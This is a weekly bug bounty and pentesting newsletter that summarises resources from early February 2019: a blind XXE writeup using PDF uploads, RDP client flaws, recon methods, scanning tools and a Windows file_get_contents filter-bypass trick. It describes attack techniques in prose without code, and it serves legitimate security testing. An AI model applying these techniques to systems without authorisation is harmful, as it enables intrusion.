The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on February 12, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 01 to 08 of February.
A $7.500 BUG Bounty Bug explained, step by step. (BLIND XXE OOB over DNS)
Another great video by @stokfredrik! It’s a writeup for a blind XXE OOB over DNS using a PDF file upload.
Classic file upload payloads & attacks didn’t work, so the last thing that @stokfredrik tried was sneaking XML entities through PDF files. He was able to trigger a DNS request from the target server (using Burp Collaborator). He then escalated the attack over multiple stages until he got a full blind XXE.
This is pretty advanced stuff but every stage is detailed and well explained, including tools and references.
Check Point researchers tested different RDP clients: rdesktop, FreeRDP and Mstsc.exe (Microsoft’s RDP client). They found 25 security vulnerabilities.
This made the news on generic infosec sites because two of the clients tested are vulnerable to reverse RDP attacks. The bugs detected allow malicious RDP servers to get remote code execution on these clients…
It’s the Little Things II: Exploiting Vulnerabilities Through Proper Reconnaissance
This is a nice addition to existing public recon methodologies. It touches a little bit of everything: asset discovery, OSINT, content discovery, and more. It’s worth reading and merging with your own current methodology.
Also, I’m not sure these are the right talks accompanying the slides, but they should at least give you some context around them:
Imagine you want to test a list of targets from your previous bugbounty notes for one specific test, a new endpoint, an XSS payload, a search for a hidden file/directory (like .git)… What would you use?
Tools like Burp Intruder allow sending multiple requests to the same target. Inception does the opposite: test the same thing on a list of targets.
It’s inspired from Snallygaster but includes more tests, is fast (because written in Go), and is highly customizable (new tests can be easily added without writing code).
The author of this blog post, a professional pentester, shares some tidbits on his pentesting methodology and custom tools.
What’s most intriguing/interesting is his framework “recron” which is an “automated continuous recon framework”. He didn’t release it but his explanations might give you new ideas for improving your own automated bug hunting tools.
Also, he shared his tool Scanomaly, a web application fuzzer scanner, which is part of that framework.
Bypass filters using < (less-than sign). A string consisting of two “less-than” signs when passed to the file_get_contents function gets replaced with an asterisk - only on Windows
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 02/01/2019 to 02/08/2019
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…